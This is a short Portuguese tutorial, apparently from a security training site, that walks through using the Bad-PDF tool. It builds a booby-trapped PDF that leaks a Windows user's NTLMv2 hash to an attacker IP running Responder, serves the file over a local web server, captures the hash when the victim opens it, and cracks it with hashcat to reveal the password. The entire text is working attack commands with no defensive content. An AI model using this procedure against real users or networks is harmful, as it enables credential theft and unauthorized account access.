A Bad-PDF é uma ferramenta que permite a criação de um arquivo PDF que assim que é executado pela vítima o atacante conhece realizar a captura do hash NTLM (NTLMv1/NTLMv2) através do Responder.
Realize o clone do projeto Bad-PDF e lista o conteúdo do diretório.
Linuxgit clone https://github.com/deepzec/Bad-Pdf cd Bad-Pdf/ ls -l
Execute o script badpdf.py e informe os dados tais como: IP do Atacante, Nome do Arquivo (PDF), Interface de Rede.
Linuxpython badpdf.py Please enter Bad-PDF host IP: 192.168.0.100 Please enter output file name: 100security.pdf Please enter the inteface name to listen(Default eth0): eth0
Aguarde... o Responder será iniciado automaticamente.
Abra um novo terminal lista o arquivo pdf criado e inicie um serviço web para compartilhar o arquivo 100security.pdf.
Linuxls -l *.pdf python -m SimpleHTTPServer 81
No computador Windows acesse: http://192.168.0.100:81, para visualizar os arquivos.
Clique no arquivo 100security.pdf.
Observe que no terminal onde o Responder está em execução é exibido o Hash NTLMv2 do usuário 100SECURITY\marcos.
Crie um arquivo novo ex: marcos.txt contendo o dado capturado.
Linuxvim marcos.txt cat marcos.txt
Utilize o hashcat para tentar descriptografar o hash NTLMv2.
hashcat -m 5600 marcos.txt wordlist.txt -o senha-marcos.txt --force
Hash Descriptografado.
Leia o conteúdo do arquivo senha-marcos.txt para visualizar a Senha.
Linuxcat senha-marcos.txt